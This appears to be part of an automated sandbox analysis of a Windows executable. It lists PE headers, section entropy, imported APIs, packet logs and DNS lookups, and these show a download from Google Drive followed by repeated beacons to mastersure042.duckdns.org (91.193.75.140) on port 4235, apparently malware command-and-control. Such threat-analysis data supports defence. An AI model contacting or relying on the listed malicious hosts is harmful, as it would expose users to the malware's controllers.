IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6b000 | 0x1c6f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x81508 | 0x710 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ef | 0x6600 | False | 0.6750919117647058 | data | 6.514810500836391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x149a | 0x1600 | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2aff8 | 0x600 | False | 0.5162760416666666 | data | 4.036693470004838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x36000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6b000 | 0x1c6f8 | 0x1c800 | False | 0.3971011513157895 | data | 5.769513251643276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x6b2b0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States
RT_ICON | 0x7bad8 | 0x7125 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x82c00 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x851a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x86250 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x86bd8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x87040 | 0x120 | data | English | United States
RT_DIALOG | 0x87160 | 0xf8 | data | English | United States
RT_DIALOG | 0x87258 | 0xa0 | data | English | United States
RT_DIALOG | 0x872f8 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x87358 | 0x5a | data | English | United States
RT_MANIFEST | 0x873b8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Nov 3, 2022 07:22:07.093504906 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.094182968 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.094422102 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.094424009 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.094461918 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.094594955 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.094595909 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.094614983 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.094640017 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.094821930 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.094821930 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.094840050 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.094861984 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.095015049 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.095174074 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.095174074 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.095206022 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.095438957 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.095465899 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.095660925 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.095860004 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.095860004 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.095901012 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.096214056 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.096370935 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.096569061 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.096605062 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.096716881 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.096807003 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.096828938 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.096852064 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.097018957 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.097018957 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.097316980 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.097647905 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.097702026 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.097882032 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.097991943 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.098047972 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.098148108 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.098334074 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.098368883 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.098547935 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.098659039 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.098715067 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.098754883 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.098942041 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.098972082 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.099134922 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.099160910 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.099369049 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.099447966 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.099476099 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.099618912 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.099620104 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.099652052 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.099976063 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.099980116 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.100013018 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.100322962 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.100347996 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.100389004 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.100739956 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.100794077 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101001024 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101175070 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101252079 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.101253033 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.101289034 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101404905 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101604939 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101633072 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.101640940 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101656914 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.101824999 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.101886988 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102001905 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102114916 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102291107 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.102291107 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.102313995 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102358103 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.102526903 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102550030 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.102569103 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102758884 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.102833986 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.102853060 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103008032 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103075027 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103075027 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103075027 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103105068 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103251934 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103316069 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103429079 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103450060 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103468895 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103586912 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103672028 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103779078 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103795052 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.103949070 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103949070 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103949070 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.103969097 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.104219913 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.104358912 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.104475021 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.104608059 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.104720116 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105191946 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105191946 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105191946 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105191946 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105191946 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105191946 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105237961 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105391026 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105571032 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105571032 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105691910 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105803013 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105803013 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.105808020 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105823040 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.105849981 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106031895 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106043100 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106065035 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106232882 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106245995 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106437922 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106497049 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106683969 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106683969 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106698990 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106852055 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106935024 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.106950998 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106950998 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.106967926 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107141972 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107157946 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107239962 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107259035 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107388020 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107433081 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107472897 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107600927 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107600927 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107625961 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107794046 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107794046 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107820988 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107846022 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.107889891 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.107908964 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108071089 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108083963 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.108108997 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108244896 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.108244896 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.108263016 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108382940 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108437061 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.108453989 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108628035 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.108644962 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108745098 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108803034 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.108819008 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.108968973 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109122038 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109273911 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109314919 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.109330893 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109508038 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.109508038 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.109524012 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109533072 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109637976 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109760046 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109787941 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.109788895 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.109805107 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.109890938 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.110076904 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.110076904 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.110269070 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.110269070 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:07.110291004 CET44349841172.217.16.193192.168.11.20
                                                                        Nov 3, 2022 07:22:07.110421896 CET49841443192.168.11.20172.217.16.193
                                                                        Nov 3, 2022 07:22:08.611685991 CET498424235192.168.11.2091.193.75.140
                                                                        Nov 3, 2022 07:22:09.621212959 CET498424235192.168.11.2091.193.75.140
                                                                        Nov 3, 2022 07:22:11.636447906 CET498424235192.168.11.2091.193.75.140
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 3, 2022 07:22:06.085922956 CET | 192.168.11.20 | 1.1.1.1 | 0xc7f7 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:06.739177942 CET | 192.168.11.20 | 1.1.1.1 | 0xb56c | Standard query (0) | doc-10-90-docs.googleusercontent.com | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:08.496257067 CET | 192.168.11.20 | 8.8.4.4 | 0x97dc | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:26.404068947 CET | 192.168.11.20 | 8.8.4.4 | 0x1c64 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:44.232770920 CET | 192.168.11.20 | 8.8.4.4 | 0xac6d | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:23:19.280148029 CET | 192.168.11.20 | 8.8.4.4 | 0x6871 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:23:36.026688099 CET | 192.168.11.20 | 8.8.4.4 | 0x60be | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:23:53.214232922 CET | 192.168.11.20 | 8.8.4.4 | 0xc8b3 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:24:30.186912060 CET | 192.168.11.20 | 8.8.4.4 | 0xf8a5 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:24:46.870704889 CET | 192.168.11.20 | 8.8.4.4 | 0x66a8 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:25:03.569710016 CET | 192.168.11.20 | 8.8.4.4 | 0xe79f | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:25:39.514545918 CET | 192.168.11.20 | 8.8.4.4 | 0x4d08 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:25:57.369896889 CET | 192.168.11.20 | 8.8.4.4 | 0x42fe | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:26:14.694293022 CET | 192.168.11.20 | 8.8.4.4 | 0xe123 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:26:50.780349016 CET | 192.168.11.20 | 8.8.4.4 | 0x4bbd | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:27:08.693469048 CET | 192.168.11.20 | 8.8.4.4 | 0xbb4b | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:27:25.725686073 CET | 192.168.11.20 | 8.8.4.4 | 0xdfc8 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:28:00.501806974 CET | 192.168.11.20 | 8.8.4.4 | 0x8e30 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:28:17.151650906 CET | 192.168.11.20 | 8.8.4.4 | 0x6830 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:28:33.804290056 CET | 192.168.11.20 | 8.8.4.4 | 0x3d83 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:29:08.687299013 CET | 192.168.11.20 | 8.8.4.4 | 0x307 | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:29:25.355581045 CET | 192.168.11.20 | 8.8.4.4 | 0x4fab | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:29:42.008141994 CET | 192.168.11.20 | 8.8.4.4 | 0x79fd | Standard query (0) | mastersure042.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 3, 2022 07:22:06.094679117 CET | 1.1.1.1 | 192.168.11.20 | 0xc7f7 | No error (0) | drive.google.com | | 142.250.186.78 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:06.778670073 CET | 1.1.1.1 | 192.168.11.20 | 0xb56c | No error (0) | doc-10-90-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 3, 2022 07:22:06.778670073 CET | 1.1.1.1 | 192.168.11.20 | 0xb56c | No error (0) | googlehosted.l.googleusercontent.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:08.606661081 CET | 8.8.4.4 | 192.168.11.20 | 0x97dc | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:26.414750099 CET | 8.8.4.4 | 192.168.11.20 | 0x1c64 | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
Nov 3, 2022 07:22:44.344129086 CET | 8.8.4.4 | 192.168.11.20 | 0xac6d | No error (0) | mastersure042.duckdns.org | | 91.193.75.140 | A (IP address) | IN (0x0001) | false
